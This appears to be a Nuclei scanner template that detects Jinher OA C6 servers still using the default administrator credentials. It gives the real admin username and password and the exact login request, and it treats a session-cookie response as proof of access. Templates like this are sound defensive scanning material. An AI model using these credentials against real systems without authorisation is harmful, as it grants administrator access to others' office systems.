id: jinher-oa-default-login

info:
  name: Jinher oa C6 Default Password
  author: ritikchaddha
  severity: high
  description: Jinher-OA C6 default administrator account credential.
  reference:
    - https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E5%92%8COA-C6-default-password.md
  tags: jinher,default-login

requests:
  - raw:
      - |
        POST /c6/Jhsoft.Web.login/AjaxForLogin.aspx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        type=login&loginCode={{base64("{{username}}")}}&pwd={{base64("{{password}}")}}&

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - "000000"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\xcf\xb5\xcd\xb3\xb9\xdc\xc0\xed\xd4\xb1\x7c"
          - "\xc4\xfa\xba\xc3\x7c\x7c\x7c"
        condition: and

      - type: word
        part: header
        words:
          - "SessionIDAdmin="

      - type: status
        status:
          - 200
